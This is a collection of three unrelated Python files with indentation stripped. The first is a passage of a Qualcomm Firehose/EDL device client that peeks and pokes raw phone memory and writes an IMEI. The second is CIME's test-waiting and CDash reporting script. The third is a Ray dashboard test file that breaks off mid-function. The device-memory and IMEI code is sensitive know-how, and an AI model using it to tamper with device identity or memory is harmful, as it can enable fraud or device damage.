if "getstorageinfo" in self.supported_functions and self.args["--memory"] is None:
storageinfo = self.cmd_getstorageinfo()
if storageinfo is not None and storageinfo != []:
for info in storageinfo:
if "storage_info" in info:
try:
si = json.loads(info)["storage_info"]
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
continue
self.info("Storage report:")
for sii in si:
self.info(f"{sii}:{si[sii]}")
if "total_blocks" in si:
self.cfg.total_blocks = si["total_blocks"]
if "block_size" in si:
self.cfg.block_size = si["block_size"]
if "page_size" in si:
self.cfg.SECTOR_SIZE_IN_BYTES = si["page_size"]
if "mem_type" in si:
self.cfg.MemoryName = si["mem_type"]
if "prod_name" in si:
self.cfg.prod_name = si["prod_name"]
if "UFS Inquiry Command Output:" in info:
self.cfg.prod_name = info.split("Output: ")[1]
self.info(info)
if "UFS Erase Block Size:" in info:
self.cfg.block_size = int(info.split("Size: ")[1], 16)
self.info(info)
if "UFS Boot" in info:
self.cfg.MemoryName = "UFS"
self.cfg.SECTOR_SIZE_IN_BYTES = 4096
if "UFS Boot Partition Enabled: " in info:
self.info(info)
if "UFS Total Active LU: " in info:
self.cfg.maxlun = int(info.split("LU: ")[1], 16)
return self.supported_functions
# OEM Stuff here below --------------------------------------------------
def cmd_writeimei(self, imei):
if len(imei) != 16:
self.info("IMEI must be 16 digits")
return False
data = "<?xml version=\"1.0\" ?><data><writeIMEI len=\"16\"/></data>"
val = self.xmlsend(data)
if val[0]:
self.info("writeIMEI succeeded.")
return True
else:
self.error("writeIMEI failed.")
return False
def cmd_getstorageinfo(self):
data = "<?xml version=\"1.0\" ?><data><getstorageinfo physical_partition_number=\"0\"/></data>"
val = self.xmlsend(data)
if val[0]:
try:
data = self.xml.getlog(val[2])
return data
except: # pylint: disable=broad-except
return None
else:
self.warning("GetStorageInfo command isn't supported.")
return None
def cmd_test(self, cmd):
token = "1234"
pk = "1234"
data = "<?xml version=\"1.0\" ?>\n<data>\n<" + cmd + " token=\"" + token + "\" pk=\"" + pk + "\" />\n</data>"
val = self.xmlsend(data)
if len(val) > 1:
if b"raw hex token" in val[2]:
return True
if b"opcmd is not enabled" in val[2]:
return True
return False
def cmd_getstorageinfo_string(self):
data = "<?xml version=\"1.0\" ?><data><getstorageinfo /></data>"
val = self.xmlsend(data)
if val[0]:
self.info(f"GetStorageInfo:\n--------------------\n")
data = self.xml.getlog(val[2])
for line in data:
self.info(line)
return True
else:
self.warning("GetStorageInfo command isn't supported.")
return False
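# cmd_poke writes memory through the Firehose <poke> tag, at most 8 bytes per
# request, retrying with the alternate "SizeInBytes" attribute spelling when the
# loader rejects the lower-case "size_in_bytes" form.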
def cmd_poke(self, address, data, filename="", info=False):
rf = None
if filename != "":
rf = open(filename, "rb")
SizeInBytes = os.stat(filename).st_size
else:
SizeInBytes = len(data)
if info:
self.info(f"Poke: Address({hex(address)}),Size({hex(SizeInBytes)})")
'''
<?xml version="1.0" ?><data><poke address64="1048576" SizeInBytes="90112" value="0x22 0x00 0x00"/></data>
'''
maxsize = 8
lengthtowrite = SizeInBytes
if lengthtowrite < maxsize:
maxsize = lengthtowrite
pos = 0
old = 0
datawritten = 0
mode = 0
if info:
print_progress(0, 100, prefix='Progress:', suffix='Complete', bar_length=50)
while lengthtowrite > 0:
if rf is not None:
content = hex(int(hexlify(rf.read(maxsize)).decode('utf-8'), 16))
else:
content = 0
if lengthtowrite < maxsize:
maxsize = lengthtowrite
for i in range(0, maxsize):
content = (content << 8) + int(
hexlify(data[pos + maxsize - i - 1:pos + maxsize - i]).decode('utf-8'), 16)
# content=hex(int(hexlify(data[pos:pos+maxsize]).decode('utf-8'),16))
content = hex(content)
if mode == 0:
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"size_in_bytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
else:
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"SizeInBytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
try:
self.cdc.write(xdata[:self.cfg.MaxXMLSizeInBytes])
except Exception as e: # pylint: disable=broad-except
self.debug(str(e))
pass
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b"SizeInBytes" in addrinfo or b"Invalid parameters" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
xdata = f"<?xml version=\"1.0\" ?><data><poke address64=\"{str(address + pos)}\" " + \
f"SizeInBytes=\"{str(maxsize)}\" value64=\"{content}\" /></data>\n"
self.cdc.write(xdata[:self.cfg.MaxXMLSizeInBytes])
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if (b'<response' in addrinfo and b'NAK' in addrinfo) or b"Invalid parameters" in addrinfo:
self.error(f"Error:{addrinfo}")
return False
if b"address" in addrinfo and b"can\'t" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
self.error(f"Error:{addrinfo}")
return False
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b'<response' in addrinfo and b'NAK' in addrinfo:
print(f"Error:{addrinfo}")
return False
pos += maxsize
datawritten += maxsize
lengthtowrite -= maxsize
if info:
prog = round(float(datawritten) / float(SizeInBytes) * float(100), 1)
if prog > old:
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
old = prog
if info:
self.info("Done writing.")
return True
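# cmd_peek reads memory through the Firehose <peek> tag; the loader answers with
# log lines of space-separated hex bytes which are unhexlified and either written
# to a file or returned as a bytes object.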
def cmd_peek(self, address, SizeInBytes, filename="", info=False):
if info:
self.info(f"Peek: Address({hex(address)}),Size({hex(SizeInBytes)})")
wf = None
if filename != "":
wf = open(filename, "wb")
'''
<?xml version="1.0" ?><data><peek address64="1048576" SizeInBytes="90112" /></data>
'''
data = f"<?xml version=\"1.0\" ?><data><peek address64=\"{address}\" " + \
f"size_in_bytes=\"{SizeInBytes}\" /></data>\n"
'''
<?xml version="1.0" encoding="UTF-8" ?><data><log value="Using address 00100000" /></data>
<?xml version="1.0" encoding="UTF-8" ?><data><log value="0x22 0x00 0x00 0xEA 0x70 0x00 0x00 0xEA 0x74 0x00
0x00 0xEA 0x78 0x00 0x00 0xEA 0x7C 0x00 0x00 0xEA 0x80 0x00 0x00 0xEA 0x84 0x00 0x00 0xEA 0x88 0x00 0x00
0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA
0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE
0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF
0xFF 0xEA 0xFE 0xFF 0xFF 0xEA 0xFE 0xFF " /></data>
'''
try:
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
except Exception as err: # pylint: disable=broad-except
self.debug(str(err))
pass
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b"SizeInBytes" in addrinfo or b"Invalid parameters" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
data = f"<?xml version=\"1.0\" ?><data><peek address64=\"{hex(address)}\" " + \
f"SizeInBytes=\"{hex(SizeInBytes)}\" /></data>"
self.cdc.write(data[:self.cfg.MaxXMLSizeInBytes])
addrinfo = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if (b'<response' in addrinfo and b'NAK' in addrinfo) or b"Invalid parameters" in addrinfo:
self.error(f"Error:{addrinfo}")
return False
if b"address" in addrinfo and b"can\'t" in addrinfo:
tmp = b""
while b"NAK" not in tmp and b"ACK" not in tmp:
tmp += self.cdc.read(self.cfg.MaxXMLSizeInBytes)
self.error(f"Error:{addrinfo}")
return False
resp = b""
dataread = 0
old = 0
if info:
print_progress(0, 100, prefix='Progress:', suffix='Complete', bar_length=50)
while True:
tmp = self.cdc.read(self.cfg.MaxXMLSizeInBytes)
if b'<response' in tmp or b"ERROR" in tmp:
break
rdata = self.xml.getlog(tmp)[0].replace("0x", "").replace(" ", "")
tmp2 = b""
try:
tmp2 = binascii.unhexlify(rdata)
except: # pylint: disable=broad-except
print(rdata)
exit(0)
dataread += len(tmp2)
if wf is not None:
wf.write(tmp2)
else:
resp += tmp2
if info:
prog = round(float(dataread) / float(SizeInBytes) * float(100), 1)
if prog > old:
print_progress(prog, 100, prefix='Progress:', suffix='Complete', bar_length=50)
old = prog
if wf is not None:
wf.close()
if b'<response' in tmp and b'ACK' in tmp:
if info:
self.info(f"Bytes from {hex(address)}, bytes read {hex(dataread)}, written to {filename}.")
return True
else:
self.error(f"Error:{addrinfo}")
return False
else:
return resp
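# cmd_memcpy copies a memory region by peeking it into host memory and poking it
# back out to the destination address.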
def cmd_memcpy(self, destaddress, sourceaddress, size):
data = self.cmd_peek(sourceaddress, size)
if data != b"" and data:
if self.cmd_poke(destaddress, data):
return True
return False
def cmd_rawxml(self, data, response=True):
if response:
val = self.xmlsend(data)
if val[0]:
self.info(f"{data} succeeded.")
return val[2]
else:
self.error(f"{data} failed.")
self.error(f"{val[2]}")
return False
else:
self.xmlsend(data, False)
return True
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
from CIME.provenance import save_test_success
from CIME.case.case import Case
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "E3SM"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
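# create_cdash_xml writes a minimal DartConfiguration.tcl, builds the
# Testing/<timestamp> directory and TAG file, generates the fake result XML and
# log upload, and finally shells out to "ctest -VV -D NightlySubmit" to upload.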
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
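# wait_for_tests is the public entry point: it fans out one watcher thread per
# test path, optionally records pass/fail provenance, and generates CDash XML
# when a build name is supplied.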
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False,
update_success=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if update_success:
caseroot = os.path.dirname(test_data[0])
with Case(caseroot, read_only=True) as case:
srcroot = case.get_value("CIMEROOT")
baseline_root = case.get_value("BASELINE_ROOT")
save_test_success(baseline_root, srcroot, test_name, test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS])
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
|
test_stats_collector.py
|
import os
import sys
import logging
import requests
import time
import traceback
import random
import pytest
import ray
import redis
import threading
import ray.new_dashboard.modules.stats_collector.stats_collector_consts \
as stats_collector_consts
import ray.new_dashboard.utils as dashboard_utils
import ray.ray_constants as ray_constants
from datetime import datetime, timedelta
from ray.cluster_utils import Cluster
from ray.new_dashboard.tests.conftest import * # noqa
from ray.test_utils import (format_web_url, wait_until_server_available,
wait_for_condition,
wait_until_succeeded_without_exception)
logger = logging.getLogger(__name__)
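# The dashboard tests below poll the REST endpoints until the expected payload
# shows up or a per-test timeout expires, since agent/stats collection is
# asynchronous.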
def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard):
@ray.remote
class Actor:
def getpid(self):
return os.getpid()
actors = [Actor.remote(), Actor.remote()]
actor_pids = [actor.getpid.remote() for actor in actors]
actor_pids = set(ray.get(actor_pids))
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
node_id = ray_start_with_dashboard["node_id"]
timeout_seconds = 10
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/nodes?view=hostnamelist")
response.raise_for_status()
hostname_list = response.json()
assert hostname_list["result"] is True, hostname_list["msg"]
hostname_list = hostname_list["data"]["hostNameList"]
assert len(hostname_list) == 1
hostname = hostname_list[0]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["hostname"] == hostname
assert detail["raylet"]["state"] == "ALIVE"
assert "raylet" in detail["cmdline"][0]
assert len(detail["workers"]) >= 2
assert len(detail["actors"]) == 2, detail["actors"]
assert len(detail["raylet"]["viewData"]) > 0
actor_worker_pids = set()
for worker in detail["workers"]:
if "ray::Actor" in worker["cmdline"][0]:
actor_worker_pids.add(worker["pid"])
assert actor_worker_pids == actor_pids
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
assert len(summary["data"]["summary"]) == 1
summary = summary["data"]["summary"][0]
assert summary["hostname"] == hostname
assert summary["raylet"]["state"] == "ALIVE"
assert "raylet" in summary["cmdline"][0]
assert "workers" not in summary
assert "actors" not in summary
assert "viewData" not in summary["raylet"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
@ray.remote
class ActorWithObjs:
def __init__(self):
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
my_obj = ray.put([1, 2, 3] * 100) # noqa
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
resp = requests.get(
webui_url + "/memory/set_fetch", params={"shouldFetch": "true"})
resp.raise_for_status()
def check_mem_table():
resp = requests.get(f"{webui_url}/memory/memory_table")
resp_data = resp.json()
assert resp_data["result"]
latest_memory_table = resp_data["data"]["memoryTable"]
summary = latest_memory_table["summary"]
# 1 ref per handle and per object the actor has a ref to
assert summary["totalActorHandles"] == len(actors) * 2
# 1 ref for my_obj
assert summary["totalLocalRefCount"] == 1
wait_until_succeeded_without_exception(
check_mem_table, (AssertionError, ), timeout_ms=1000)
def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
@ray.remote
class ActorWithObjs:
def __init__(self):
print("I also log a line")
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
timeout_seconds = 20
start_time = time.time()
last_ex = None
def check_node_details():
resp = requests.get(f"{webui_url}/nodes?view=details")
resp_json = resp.json()
resp_data = resp_json["data"]
clients = resp_data["clients"]
node = clients[0]
assert len(clients) == 1
assert len(node.get("actors")) == 2
# Workers information should be in the detailed payload
assert "workers" in node
assert "logCount" in node
# Two lines printed by ActorWithObjs
# One line printed by autoscaler: monitor.py:118 -- Monitor: Started
assert node["logCount"] > 2
print(node["workers"])
assert len(node["workers"]) == 2
assert node["workers"][0]["logCount"] == 1
while True:
time.sleep(1)
try:
check_node_details()
break
except (AssertionError, KeyError, IndexError) as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
